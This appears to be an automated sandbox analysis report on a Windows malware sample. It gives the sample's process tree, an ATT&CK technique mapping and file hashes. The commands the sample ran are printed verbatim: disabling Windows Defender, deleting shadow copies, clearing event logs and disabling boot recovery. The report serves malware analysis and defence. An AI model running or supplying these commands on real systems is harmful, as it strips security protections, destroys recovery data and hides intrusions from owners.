PID 2876 wrote to memory of 976	2876	56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe	net.exe
PID 976 wrote to memory of 788	976	net.exe	net1.exe
PID 976 wrote to memory of 788	976	net.exe	net1.exe
PID 2876 wrote to memory of 3236	2876	56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe	sc.exe
PID 2876 wrote to memory of 3236	2876	56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe	sc.exe
PID 2876 wrote to memory of 948	2876	56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe	sc.exe
PID 2876 wrote to memory of 948	2876	56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe	sc.exe
PID 2876 wrote to memory of 1192	2876	56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe	sc.exe
PID 2876 wrote to memory of 1192	2876	56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe	sc.exe
PID 2876 wrote to memory of 1388	2876	56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe	sc.exe
PID 2876 wrote to memory of 1388	2876	56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe	sc.exe
PID 2876 wrote to memory of 1428	2876	56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe	sc.exe
PID 2876 wrote to memory of 1428	2876	56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe	sc.exe
PID 2876 wrote to memory of 1836	2876	56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe	sc.exe
PID 2876 wrote to memory of 1836	2876	56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe	sc.exe
PID 2876 wrote to memory of 1848	2876	56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe	sc.exe
PID 2876 wrote to memory of 1848	2876	56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe	sc.exe
PID 2876 wrote to memory of 1948	2876	56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe	sc.exe
PID 2876 wrote to memory of 1948	2876	56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe	sc.exe
PID 2876 wrote to memory of 2240	2876	56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe	sc.exe
PID 2876 wrote to memory of 2240	2876	56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe	sc.exe
PID 2876 wrote to memory of 2896	2876	56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe	reg.exe
PID 2876 wrote to memory of 2896	2876	56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe	reg.exe
PID 2876 wrote to memory of 3096	2876	56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe	reg.exe
PID 2876 wrote to memory of 3096	2876	56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe	reg.exe
PID 2876 wrote to memory of 692	2876	56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe	reg.exe
PID 2876 wrote to memory of 692	2876	56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe	reg.exe
PID 2876 wrote to memory of 2220	2876	56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe	reg.exe
PID 2876 wrote to memory of 2220	2876	56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe	reg.exe
PID 2876 wrote to memory of 2116	2876	56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe	reg.exe
PID 2876 wrote to memory of 2116	2876	56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe	reg.exe

C:\Users\Admin\AppData\Local\Temp\56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe
"C:\Users\Admin\AppData\Local\Temp\56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe"
1⤵
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2876

C:\Windows\SYSTEM32\net.exe
net.exe stop "SamSs" /y
2⤵
- Suspicious use of WriteProcessMemory
PID:3592

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SamSs" /y
3⤵
PID:3824

C:\Windows\SYSTEM32\net.exe
net.exe stop "SDRSVC" /y
2⤵
- Suspicious use of WriteProcessMemory
PID:3524

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SDRSVC" /y
3⤵
PID:3588

C:\Windows\SYSTEM32\net.exe
net.exe stop "SstpSvc" /y
2⤵
- Suspicious use of WriteProcessMemory
PID:520

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SstpSvc" /y
3⤵
PID:1152

C:\Windows\SYSTEM32\net.exe
net.exe stop "UI0Detect" /y
2⤵
- Suspicious use of WriteProcessMemory
PID:852

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "UI0Detect" /y
3⤵
PID:2452

C:\Windows\SYSTEM32\net.exe
net.exe stop "vmicvss" /y
2⤵
- Suspicious use of WriteProcessMemory
PID:680

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "vmicvss" /y
3⤵
PID:3680

C:\Windows\SYSTEM32\net.exe
net.exe stop "VSS" /y
2⤵
- Suspicious use of WriteProcessMemory
PID:1252

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "VSS" /y
3⤵
PID:2772

C:\Windows\SYSTEM32\net.exe
net.exe stop "wbengine" /y
2⤵
- Suspicious use of WriteProcessMemory
PID:3384

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "wbengine" /y
3⤵
PID:1492

C:\Windows\SYSTEM32\net.exe
net.exe stop "WebClient" /y
2⤵
- Suspicious use of WriteProcessMemory
PID:608

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "WebClient" /y
3⤵
PID:716

C:\Windows\SYSTEM32\net.exe
net.exe stop "UnistoreSvc_1515a" /y
2⤵
- Suspicious use of WriteProcessMemory
PID:976

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "UnistoreSvc_1515a" /y
3⤵
PID:788

C:\Windows\SYSTEM32\sc.exe
sc.exe config "SamSs" start= disabled
2⤵
PID:3236

C:\Windows\SYSTEM32\sc.exe
sc.exe config "SDRSVC" start= disabled
2⤵
PID:948

C:\Windows\SYSTEM32\sc.exe
sc.exe config "SstpSvc" start= disabled
2⤵
PID:1192

C:\Windows\SYSTEM32\sc.exe
sc.exe config "UI0Detect" start= disabled
2⤵
PID:1388

C:\Windows\SYSTEM32\sc.exe
sc.exe config "vmicvss" start= disabled
2⤵
PID:1428

C:\Windows\SYSTEM32\sc.exe
sc.exe config "VSS" start= disabled
2⤵
PID:1836

C:\Windows\SYSTEM32\sc.exe
sc.exe config "wbengine" start= disabled
2⤵
PID:1848

C:\Windows\SYSTEM32\sc.exe
sc.exe config "WebClient" start= disabled
2⤵
PID:1948

C:\Windows\SYSTEM32\sc.exe
sc.exe config "UnistoreSvc_1515a" start= disabled
2⤵
PID:2240

C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
2⤵
PID:2896

C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
2⤵
PID:3096

C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
2⤵
PID:692

C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
2⤵
PID:2220

C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
2⤵
PID:2116

C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
2⤵
PID:3908

C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
2⤵
PID:1452

C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
2⤵
PID:2172

C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
2⤵
PID:3776

C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
2⤵
PID:3976

C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
2⤵
PID:3988

C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
2⤵
PID:3528

C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
2⤵
PID:60

C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
2⤵
PID:1084

C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
2⤵
PID:2000

C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
2⤵
PID:644

C:\Windows\SYSTEM32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
2⤵
PID:2784

C:\Windows\SYSTEM32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
2⤵
PID:676

C:\Windows\SYSTEM32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
2⤵
PID:400

C:\Windows\SYSTEM32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
2⤵
PID:2708

C:\Windows\SYSTEM32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
2⤵
PID:1200

C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f
2⤵
PID:1332

C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f
2⤵
PID:1132

C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
2⤵
PID:1408

C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
2⤵
PID:2252

C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
2⤵
PID:1968

C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
2⤵
PID:4080

C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
2⤵
PID:2840

C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
2⤵
PID:3860

C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
2⤵
PID:1208

C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
2⤵
PID:3728

C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
2⤵
PID:2128

C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
2⤵
PID:2176

C:\Windows\SYSTEM32\vssadmin.exe
vssadmin.exe delete shadows /all /quiet
2⤵
- Interacts with shadow copies
PID:1324

C:\Windows\SYSTEM32\wevtutil.exe
wevtutil.exe cl system
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3688

C:\Windows\SYSTEM32\wevtutil.exe
wevtutil.exe cl security
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:820

C:\Windows\SYSTEM32\wevtutil.exe
wevtutil.exe cl application
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1288

C:\Windows\System32\Wbem\wmic.exe
wmic.exe SHADOWCOPY /nointeractive
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:916

C:\Windows\System32\Wbem\wmic.exe
wmic.exe shadowcopy delete
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:660

C:\Windows\SYSTEM32\bcdedit.exe
bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
2⤵
- Modifies boot configuration data using bcdedit
PID:836

C:\Windows\SYSTEM32\bcdedit.exe
bcdedit.exe /set {default} recoveryenabled no
2⤵
- Modifies boot configuration data using bcdedit
PID:960

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
2⤵
PID:1424

C:\Program Files\Windows Defender\MpCmdRun.exe
"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
3⤵
- Deletes Windows Defender Definitions
PID:4040

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true
2⤵
PID:1916

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIOAVProtection $true
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:2208

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
2⤵
PID:696

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableRealtimeMonitoring $true
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:1584

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Command-Line Interface

T1059

Persistence

Modify Existing Service

T1031

Privilege Escalation

Defense Evasion

Impair Defenses

T1562

Modify Registry

T1112

Disabling Security Tools

T1089

Indicator Removal on Host

T1070

File Deletion

T1107

Credential Access

Credentials in Files

T1081

Discovery

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
MD5
8592ba100a78835a6b94d5949e13dfc1

SHA1
63e901200ab9a57c7dd4c078d7f75dcd3b357020

SHA256
fdd7d9def6f9f0c0f2e60dbc8a2d1999071cd7d3095e9e087bb1cda7a614ac3c

SHA512
87f98e6cb61b2a2a7d65710c4d33881d89715eb7a06e00d492259f35c3902498baabffc5886be0ec5a14312ad4c262e3fc40cd3a5cb91701af0fb229726b88c3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
c57ec04f1134fab4786810b1d776d202

SHA1
53f4389c35f8f6cd8c61742d2493aa63126259cc

SHA256
c160bb93d9464a042de9c79d4b6ab7be980575fd22cbae718f1297d0dee69abe

SHA512
c748cc385db95c21ff73f85f300ea36a56d71e95b60af3d49bd4ff15c82376e893a47a910836df329180ed80f91c1223669bfe87acefa2d02b73b2cedb6612b4

Download Submit
memory/60-157-0x0000000000000000-mapping.dmp

Download
memory/400-163-0x0000000000000000-mapping.dmp

Download
memory/520-122-0x0000000000000000-mapping.dmp

Download
memory/608-132-0x0000000000000000-mapping.dmp

Download
memory/644-160-0x0000000000000000-mapping.dmp

Download
memory/676-162-0x0000000000000000-mapping.dmp

Download
memory/680-126-0x0000000000000000-mapping.dmp

Download
memory/692-147-0x0000000000000000-mapping.dmp

Download
memory/716-133-0x0000000000000000-mapping.dmp

Download
memory/788-135-0x0000000000000000-mapping.dmp

Download
memory/820-180-0x0000000000000000-mapping.dmp

Download
memory/852-124-0x0000000000000000-mapping.dmp

Download
memory/948-137-0x0000000000000000-mapping.dmp

Download
memory/976-134-0x0000000000000000-mapping.dmp

Download
memory/1084-158-0x0000000000000000-mapping.dmp

Download
memory/1132-167-0x0000000000000000-mapping.dmp

Download
memory/1152-123-0x0000000000000000-mapping.dmp

Download
memory/1192-138-0x0000000000000000-mapping.dmp

Download
memory/1200-165-0x0000000000000000-mapping.dmp

Download
memory/1208-174-0x0000000000000000-mapping.dmp

Download
memory/1252-128-0x0000000000000000-mapping.dmp

Download
memory/1288-181-0x0000000000000000-mapping.dmp

Download
memory/1324-178-0x0000000000000000-mapping.dmp

Download
memory/1332-166-0x0000000000000000-mapping.dmp

Download
memory/1388-139-0x0000000000000000-mapping.dmp

Download
memory/1408-168-0x0000000000000000-mapping.dmp

Download
memory/1428-140-0x0000000000000000-mapping.dmp

Download
memory/1452-151-0x0000000000000000-mapping.dmp

Download
memory/1492-131-0x0000000000000000-mapping.dmp

Download
memory/1584-228-0x000001DDCA800000-0x000001DDCA802000-memory.dmp

Filesize
8KB

Download
memory/1584-238-0x000001DDCC200000-0x000001DDCC202000-memory.dmp

Filesize
8KB

Download
memory/1584-224-0x000001DDCA800000-0x000001DDCA802000-memory.dmp

Filesize
8KB

Download
memory/1584-225-0x000001DDCA800000-0x000001DDCA802000-memory.dmp

Filesize
8KB

Download
memory/1584-261-0x000001DDCC208000-0x000001DDCC209000-memory.dmp

Filesize
4KB

Download
memory/1584-221-0x000001DDCA800000-0x000001DDCA802000-memory.dmp

Filesize
8KB

Download
memory/1584-222-0x000001DDCA800000-0x000001DDCA802000-memory.dmp

Filesize
8KB

Download
memory/1584-229-0x000001DDCA800000-0x000001DDCA802000-memory.dmp

Filesize
8KB

Download
memory/1584-230-0x000001DDCA800000-0x000001DDCA802000-memory.dmp

Filesize
8KB

Download
memory/1584-232-0x000001DDCA800000-0x000001DDCA802000-memory.dmp

Filesize
8KB

Download
memory/1584-223-0x000001DDCA800000-0x000001DDCA802000-memory.dmp

Filesize
8KB

Download
memory/1584-243-0x000001DDCC206000-0x000001DDCC208000-memory.dmp

Filesize
8KB

Download
memory/1584-240-0x000001DDCC203000-0x000001DDCC205000-memory.dmp

Filesize
8KB

Download
memory/1836-141-0x0000000000000000-mapping.dmp

Download
memory/1848-142-0x0000000000000000-mapping.dmp

Download
memory/1948-143-0x0000000000000000-mapping.dmp

Download
memory/1968-170-0x0000000000000000-mapping.dmp

Download
memory/2000-159-0x0000000000000000-mapping.dmp

Download
memory/2116-149-0x0000000000000000-mapping.dmp

Download
memory/2128-176-0x0000000000000000-mapping.dmp

Download
memory/2172-152-0x0000000000000000-mapping.dmp

Download
memory/2176-177-0x0000000000000000-mapping.dmp

Download
memory/2208-188-0x000001B734D50000-0x000001B734D52000-memory.dmp

Filesize
8KB

Download
memory/2208-192-0x000001B751000000-0x000001B751001000-memory.dmp

Filesize
4KB

Download
memory/2208-237-0x000001B74EF28000-0x000001B74EF29000-memory.dmp

Filesize
4KB

Download
memory/2208-219-0x000001B734D50000-0x000001B734D52000-memory.dmp

Filesize
8KB

Download
memory/2208-218-0x000001B734D50000-0x000001B734D52000-memory.dmp

Filesize
8KB

Download
memory/2208-197-0x000001B74EF26000-0x000001B74EF28000-memory.dmp

Filesize
8KB

Download
memory/2208-195-0x000001B74EF20000-0x000001B74EF22000-memory.dmp

Filesize
8KB

Download
memory/2208-196-0x000001B74EF23000-0x000001B74EF25000-memory.dmp

Filesize
8KB

Download
memory/2208-193-0x000001B734D50000-0x000001B734D52000-memory.dmp

Filesize
8KB

Download
memory/2208-190-0x000001B734D50000-0x000001B734D52000-memory.dmp

Filesize
8KB

Download
memory/2208-191-0x000001B734D50000-0x000001B734D52000-memory.dmp

Filesize
8KB

Download
memory/2208-182-0x000001B734D50000-0x000001B734D52000-memory.dmp

Filesize
8KB

Download
memory/2208-183-0x000001B734D50000-0x000001B734D52000-memory.dmp

Filesize
8KB

Download
memory/2208-184-0x000001B734D50000-0x000001B734D52000-memory.dmp

Filesize
8KB

Download
memory/2208-185-0x000001B734D50000-0x000001B734D52000-memory.dmp

Filesize
8KB

Download
memory/2208-186-0x000001B734D50000-0x000001B734D52000-memory.dmp

Filesize
8KB

Download
memory/2208-187-0x000001B7368C0000-0x000001B7368C1000-memory.dmp

Filesize
4KB

Download
memory/2208-189-0x000001B734D50000-0x000001B734D52000-memory.dmp

Filesize
8KB

Download
memory/2220-148-0x0000000000000000-mapping.dmp

Download
memory/2240-144-0x0000000000000000-mapping.dmp

Download
memory/2252-169-0x0000000000000000-mapping.dmp

Download
memory/2452-125-0x0000000000000000-mapping.dmp

Download
memory/2708-164-0x0000000000000000-mapping.dmp

Download
memory/2772-129-0x0000000000000000-mapping.dmp

Download
memory/2784-161-0x0000000000000000-mapping.dmp

Download
memory/2840-172-0x0000000000000000-mapping.dmp

Download
memory/2896-145-0x0000000000000000-mapping.dmp

Download
memory/3096-146-0x0000000000000000-mapping.dmp

Download
memory/3236-136-0x0000000000000000-mapping.dmp

Download
memory/3384-130-0x0000000000000000-mapping.dmp

Download
memory/3524-120-0x0000000000000000-mapping.dmp

Download
memory/3528-156-0x0000000000000000-mapping.dmp

Download
memory/3588-121-0x0000000000000000-mapping.dmp

Download
memory/3592-118-0x0000000000000000-mapping.dmp

Download
memory/3680-127-0x0000000000000000-mapping.dmp

Download
memory/3688-179-0x0000000000000000-mapping.dmp

Download
memory/3728-175-0x0000000000000000-mapping.dmp

Download
memory/3776-153-0x0000000000000000-mapping.dmp

Download
memory/3824-119-0x0000000000000000-mapping.dmp

Download
memory/3860-173-0x0000000000000000-mapping.dmp

Download
memory/3908-150-0x0000000000000000-mapping.dmp

Download
memory/3976-154-0x0000000000000000-mapping.dmp

Download
memory/3988-155-0x0000000000000000-mapping.dmp

Download
memory/4080-171-0x0000000000000000-mapping.dmp

Download